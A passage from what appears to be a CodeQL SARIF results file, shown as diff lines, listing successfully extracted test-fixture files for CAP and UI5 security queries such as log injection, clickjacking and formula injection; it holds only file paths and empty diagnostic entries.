: 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 110 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 111 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 112 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 116 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/lib/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 117 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/src/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 118 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/src/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 119 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 120 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 121 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 123 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", - "uriBaseId" : "%SRCROOT%", - "index" : 124 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.json", - "uriBaseId" : "%SRCROOT%", - "index" : 125 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 126 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/JsonParser/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 127 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 128 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/binding_path/binding1.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 129 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 130 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 131 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 132 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 133 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 134 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 135 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 136 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 137 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 138 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 139 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 140 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 141 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 142 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 143 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 144 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 145 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 146 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 147 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 148 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 149 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 150 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 151 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 152 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 153 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 155 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 156 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 157 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 158 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 159 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 160 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 161 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 162 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 163 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 164 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 165 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 167 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 168 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 169 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 170 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" 